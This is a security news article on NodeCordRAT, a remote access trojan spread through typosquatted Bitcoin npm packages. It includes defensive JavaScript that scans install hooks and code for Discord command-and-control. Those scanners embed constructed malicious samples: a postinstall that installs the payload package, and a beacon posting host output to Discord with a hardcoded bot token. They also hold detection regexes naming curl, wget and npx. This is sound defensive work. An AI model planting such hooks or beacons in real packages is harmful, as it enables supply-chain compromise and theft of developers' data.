New Malware NodeCordRAT Discovered in Malicious npm Packages Targeting Bitcoin Users

By Tina Reynolds

Zscaler ThreatLabz researchers Satyam Singh and Lakhan Parashar have discovered a previously undocumented Remote Access Trojan (RAT), dubbed NodeCordRAT, hidden in three malicious npm packages. The RAT was tailor-made to infect developers in the npm ecosystem.

The packages, published by the npm user “wenmoonx,” were removed from the registry in November 2025. The three packages, bitcoin-main-lib, bitcoin-lib-js and bip40, were deliberately named to resemble official libraries from the bitcoinjs project. By the time they were taken down they had already attracted substantial traffic: bitcoin-main-lib had 2,300 downloads, bitcoin-lib-js 193 and bip40 970.

Delivery Mechanism and Functionality

NodeCordRAT is delivered through an npm lifecycle hook. Installing either bitcoin-main-lib or bitcoin-lib-js runs a post-installation script, and that script in turn installs the bip40 package, which is where the malicious payload actually lives. The two Bitcoin-themed packages are only loaders; a developer who never asked for bip40 still ends up with it on disk.

“The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the malicious payload,” – Satyam Singh and Lakhan Parashar
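One practical check against the chain just described is to audit a package's lifecycle scripts before letting npm run them. The script below is an added example written for this article, not code from the Zscaler report or from the malicious packages; the sample manifest and postinstall body are constructed to mirror the described loader-then-payload chain, using the package and file names the researchers give (bitcoin-main-lib, postinstall.cjs, bip40).

```javascript
// Added example (not from the Zscaler report or the packages it describes):
// audit an npm manifest and its install script for the chained-install
// pattern described above. SAMPLE_MANIFEST and SAMPLE_POSTINSTALL are
// constructed to mirror that chain; "bitcoin-main-lib", "postinstall.cjs"
// and "bip40" are the names given in the report.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Commands in an install hook that usually mean "fetch and run more code".
const SUSPICIOUS_CMD = [
  /\bnpm\s+(?:i|install|add)\b/i, // installs another package at install time
  /\bnpx\b/i,                      // runs an arbitrary package binary
  /\bcurl\b|\bwget\b/i,            // downloads from the network
  /\bnode\s+\S+\.[cm]?js\b/i,      // executes a script shipped in the tarball
];

// Returns one finding per lifecycle hook present in the manifest.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  return LIFECYCLE_HOOKS.filter((hook) => hook in scripts).map((hook) => {
    const cmd = String(scripts[hook]);
    const reasons = SUSPICIOUS_CMD.filter((re) => re.test(cmd)).map((re) => re.source);
    return { name: manifest.name, hook, cmd, suspicious: reasons.length > 0, reasons };
  });
}

// Pulls package names out of "npm install <pkg>" calls inside a script body,
// so the reviewer can see what a postinstall hook drags in.
function findChainedInstalls(source) {
  const re = /\bnpm\s+(?:i|install|add)\s+((?:@[\w.-]+\/)?[\w.-]+)/g;
  return [...new Set([...source.matchAll(re)].map((m) => m[1]))];
}

// Constructed sample manifest, shaped like the loader packages described.
const SAMPLE_MANIFEST = {
  name: 'bitcoin-main-lib',
  version: '1.0.0',
  scripts: { postinstall: 'node postinstall.cjs' },
};

// Constructed sample postinstall.cjs body: installs the payload package.
const SAMPLE_POSTINSTALL = `
const { execSync } = require('child_process');
execSync('npm install bip40', { stdio: 'ignore' });
`;

function demo() {
  return {
    findings: auditManifest(SAMPLE_MANIFEST),
    chained: findChainedInstalls(SAMPLE_POSTINSTALL),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

To get the manifest and script without executing anything, download the tarball with `npm pack <package>` and unpack it, or install with `npm install --ignore-scripts` and inspect node_modules afterwards; a postinstall hook that itself runs `npm install` on a package the manifest never declares as a dependency is the signature worth escalating.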

After installation, NodeCordRAT opens a covert command-and-control channel to a hard-coded Discord server. Remote operators issue instructions over that channel, and because the traffic is ordinary HTTPS to Discord's API it blends in with legitimate use and is harder to spot. Data collected from the host is exfiltrated the same way: the malware calls Discord's API with a hardcoded bot token and posts the results to a private channel.

“This data is exfiltrated using Discord’s API with a hardcoded token and sent to a private channel,” – Zscaler
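The combination the researchers describe, a hardcoded Discord token next to calls to Discord's HTTP API, is something a reviewer can triage statically. The scanner below is an added example written for this article, not code from the Zscaler report. The token shape it looks for (three dot-separated base64url segments, the first encoding the bot's numeric user id) is an assumption based on how Discord bot tokens are commonly structured and should be treated as a heuristic; SAMPLE_SOURCE is constructed and the token in it is fake.

```javascript
// Added example (not from the Zscaler report): static triage of a JavaScript
// file for the Discord C2 pattern described above, i.e. a hardcoded bot token
// plus calls to Discord's HTTP API. The token format below is an assumption
// (heuristic, not a spec). SAMPLE_SOURCE is constructed; the token is fake.
const DISCORD_API_RE = /https?:\/\/(?:discord(?:app)?\.com\/api|gateway\.discord\.gg)[^\s'"`]*/g;
const BOT_TOKEN_RE = /\b[\w-]{23,28}\.[\w-]{6,7}\.[\w-]{25,}\b/g;
const BOT_HEADER_RE = /Authorization['"]?\s*:\s*['"]Bot\s/;

// The first token segment is assumed to be base64url of the numeric user id;
// decode it when it looks right so the finding can be pivoted on, else null.
function decodeBotUserId(token) {
  const seg = token.split('.')[0].replace(/-/g, '+').replace(/_/g, '/');
  const decoded = Buffer.from(seg, 'base64').toString('utf8');
  return /^\d{15,20}$/.test(decoded) ? decoded : null;
}

// Keep a recognisable prefix and suffix so findings can be correlated without
// copying the full credential into a report.
function redact(token) {
  return token.slice(0, 6) + '...' + token.slice(-4);
}

function scanForDiscordC2(source) {
  const apiRefs = [...new Set(source.match(DISCORD_API_RE) || [])];
  const tokens = [...new Set(source.match(BOT_TOKEN_RE) || [])].map((t) => ({
    token: redact(t),
    botUserId: decodeBotUserId(t),
  }));
  const hardcodedBotHeader = BOT_HEADER_RE.test(source);
  let verdict = 'clean';
  if (tokens.length && (apiRefs.length || hardcodedBotHeader)) verdict = 'likely-discord-c2';
  else if (apiRefs.length) verdict = 'discord-api-use';
  return { verdict, apiRefs, tokens, hardcodedBotHeader };
}

// Constructed sample: a beacon that posts host output to a private channel
// using a hardcoded bot token. The token and channel id are made up.
const SAMPLE_SOURCE = `
const TOKEN = "MTIzNDU2Nzg5MDEyMzQ1Njc4OQ.GaBcDe.abcdefghijklmnopqrstuvwxyz0123";
const API = "https://discord.com/api/v10";
async function beacon(hostId, output) {
  await fetch(API + "/channels/000000000000000000/messages", {
    method: "POST",
    headers: { "Authorization": "Bot " + TOKEN, "Content-Type": "application/json" },
    body: JSON.stringify({ content: hostId + ": " + output })
  });
}
`;

console.log(JSON.stringify(scanForDiscordC2(SAMPLE_SOURCE), null, 2));
```

A hit on the token alone is not proof of malice, since legitimate bots also embed tokens in careless code, but a token sitting in a package that has no business talking to Discord, next to a channel post of command output, is the shape described in the report. The decoded user id gives the responder something to report to Discord's abuse team and to pivot on across samples.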

Targeted Platforms and Unique Identification

NodeCordRAT is cross-platform and runs on Windows, Linux and macOS. It fingerprints the infected host to derive a unique identifier, which lets the remote operator tell compromised machines apart and command each one individually.

Delivering the attack through npm packages points to a targeted campaign. The victims are developers, who routinely pull third-party components from the registry into their own projects and CI pipelines. By masquerading as well-known, trusted Bitcoin development libraries, the packages gave NodeCordRAT an easy way onto those developers' systems.